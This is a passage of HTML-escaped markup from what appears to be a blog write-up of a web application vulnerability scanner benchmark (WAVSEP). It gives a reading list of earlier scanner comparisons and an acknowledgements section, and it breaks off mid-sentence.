release &lt;b&gt;part II&lt;/b&gt;, which will have a very different result format compared
to the typical WAVSEP benchmark.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;25. Recommended Read-List: Benchmarks&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following resources include additional information on
previous benchmarks, comparisons and assessments in the field of web
application vulnerability scanners:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &quot;&lt;a href=&quot;http://hackmiami.org/whitepapers/HackMiami2013PwnOff.pdf&quot;&gt;HackMiami Web
Application Scanner 2013 PwnOff&lt;/a&gt;&quot;, by James Ball, Alexander Heid, Rod
Soto (a comparison of 5 web application scanners published at the HackMiami
2013 conference).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;a href=&quot;http://sectooladdict.blogspot.com/2012/07/2012-web-application-scanner-benchmark.html&quot;&gt;&quot;Top
10: The Web Application Vulnerability Scanners Benchmark, 2012&quot;&lt;/a&gt;, one
of the predecessors of the current benchmark, by &lt;a href=&quot;https://twitter.com/sectooladdict&quot;&gt;Shay Chen&lt;/a&gt; (a comparison of 60
commercial and open source scanners, July 2012)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;a href=&quot;https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final225.pdf&quot;&gt;&quot;Enemy
of the State: A State-Aware Black-Box Web Vulnerability Scanner&quot;&lt;/a&gt;, by Adam
Doup´e, Ludovico Cavedon, Christopher Kruegel, and Giovanni Vigna (a comparison
of 3 scanners published in 2012).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://resources.infosecinstitute.com/sql-injection-http-headers/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;SQL Injection through HTTP Headers&quot;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;, by Yasser Aboukir (an analysis and enhancement of the 2011
60 scanners benchmark, with a different approach for interpreting the results,
March 2012)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sectooladdict.blogspot.co.il/2011/08/commercial-web-application-scanner.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;The Scanning Legion: Web Application Scanners Accuracy
Assessment &amp;amp; Feature Comparison&quot;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;,
one of the predecessors of the current benchmark, by &lt;a href=&quot;https://twitter.com/sectooladdict&quot;&gt;Shay Chen&lt;/a&gt; (a comparison of 60
commercial and open source scanners, August 2011)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://andrewpetukhov.blogspot.com/2011/08/building-benchmark-for-sql-injection.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;Building a Benchmark for SQL Injection Scanners&quot;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;, by Andrew Petukhov (a commercial and opensource scanner
SQL injection benchmark with a generator that produces 27680 (&lt;b&gt;!!!&lt;/b&gt;) test
cases, August 2011)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;a href=&quot;https://www.infosecisland.com/blogview/12935-Webapp-Scanner-Review-Acunetix-Versus-Netsparker.html&quot;&gt;Webapp
Scanner Review: Acunetix versus Netsparker&quot;,&lt;/a&gt; by Mark Baldwin
(commercial scanner comparison, April 2011)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;u&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;a href=&quot;http://www.delaat.net/rp/2010-2011/p27/presentation.pdf&quot;&gt;Effectiveness of
Automated Application Penetration Testing Tools&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&quot;, by
Alexandre Miguel Ferreira and Harald Kleppe (commercial and freeware scanner
comparison, February 2011)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Web Application Scanners Accuracy Assessment&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, one of the predecessors of the current benchmark, by
&lt;a href=&quot;https://twitter.com/sectooladdict&quot;&gt;Shay Chen&lt;/a&gt; (a comparison of 43
free and open source scanners, December 2010)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/images/2/28/Black_Box_Scanner_Presentation.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;State of the Art: Automated Black-Box Web Application
Vulnerability Testing&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot; (&lt;/span&gt;&lt;a href=&quot;http://theory.stanford.edu/~jcm/papers/pci_oakland10.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Original Paper&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;),
by Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell (May 2010) – original
paper&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://www.ntobjectives.com/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Analyzing the Accuracy and Time Costs of Web Application
Security Scanners&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, by Larry Suto (commercial
scanners comparison, February 2010)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Why Johnny Can’t Pentest: An Analysis of Black-box Web
Vulnerability Scanners&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, by
Adam Doup´e, Marco Cova, Giovanni Vigna (commercial and open source scanner
comparison, 2010)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://www.darknet.org.uk/content/files/WebVulnScanners.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Web Vulnerability Scanner Evaluation&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, by AnantaSec (commercial scanner comparison, January
2009)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://ha.ckers.org/files/CoverageOfWebAppScanners.zip&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Analyzing the Effectiveness and Coverage of Web Application
Security Scanners&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, by Larry Suto (commercial
scanners comparison, October 2007)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://www.informationweek.com/news/202201216&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Rolling
Review: Web App Scanners Still Have Trouble with Ajax&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot;, by Jordan Wiens (commercial scanners comparison,
October 2007)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&quot;&lt;/span&gt;&lt;a href=&quot;http://www.virtualforge.de/whitepapers/web_scanner_benchmark.pdf&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Web Application Vulnerability Scanners – a Benchmark&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&quot; , by Andreas Wiegenstein, Frederik Weidemann, Dr.
Markus Schumacher, Sebastian Schinzel (Anonymous scanners comparison, October
2006)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;26. Acknowledgements&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;While performing the research described in this article, I
have received help from plenty of individuals and resources, and I’d like to
take the opportunity to acknowledge them all.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To the researchers &lt;/span&gt;&lt;a href=&quot;https://twitter.com/ozhansisic&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Ozhan
Sisic&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; and &lt;/span&gt;&lt;a href=&quot;https://twitter.com/sharath_unni&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Sharath
Unni&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; which contributed content and
results to the assessment, and did so at the expense of their own time, in
dense timeframes, and often in unreasonable hours and timeframes.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To the various additional volunteers that did their best to
assist me whenever they could, especially to the ones that chose to stay
anonymous.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To the various members at &lt;b&gt;&lt;a href=&quot;http://www.denimgroup.com/&quot;&gt;Denim Group&lt;/a&gt;&lt;/b&gt;, and especially &lt;a href=&quot;https://twitter.com/danielcornell&quot;&gt;Dan Cornel&lt;/a&gt;, which assisted
throughout the project, adapted their excellent platform &lt;a href=&quot;https://github.com/denimgroup/threadfix/&quot;&gt;Threadfix&lt;/a&gt; to fit my needs,
and enabled me to handle &lt;b&gt;nearly unreadable results&lt;/b&gt; and &lt;b&gt;share
information&lt;/b&gt; with volunteers that participated in the tests around the
world.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For the various entities and projects that contributed code
to WAVSEP, including (but not limited to) the various authors of the &lt;a href=&quot;https://code.google.com/p/zaproxy/&quot;&gt;ZAP project&lt;/a&gt; and &lt;a href=&quot;https://twitter.com/lavakumark&quot;&gt;Lavakumar Kuppan&lt;/a&gt; from the &lt;a href=&quot;https://ironwasp.org/&quot;&gt;IronWASP&lt;/a&gt; project.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To &lt;a href=&quot;https://twitter.com/dan_kuykendall&quot;&gt;Dan
Kuÿkendall&lt;/a&gt; from NTOBJECTives who permitted me to use their online enhanced adaptation
of WIVET as an additional verification mechanism for the local WIVET results.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For all the &lt;b&gt;open source&lt;/b&gt; &lt;b&gt;tool authors&lt;/b&gt; that
assisted me in testing the various tools in unreasonable late night hours and
bothered to adjust their tools for me, discuss their various features and
invest their time in explaining how I can optimize their use,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To the &lt;b&gt;CEO&#39;s, Product Managers, Marketing Executives,&lt;/b&gt;
&lt;b&gt;QA engineers, Support Personal and Development teams&lt;/b&gt; of commercial
vendors, which saved me tons of time, supported me throughout the process,
helped me overcome obstacles and made my experience a pleasant one.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;To the various information sources that helped me gather the
list of scanners over the years, spread the news about the previous benchmarks,
and gain knowledge, ideas, and insights, including (but not limited to) information
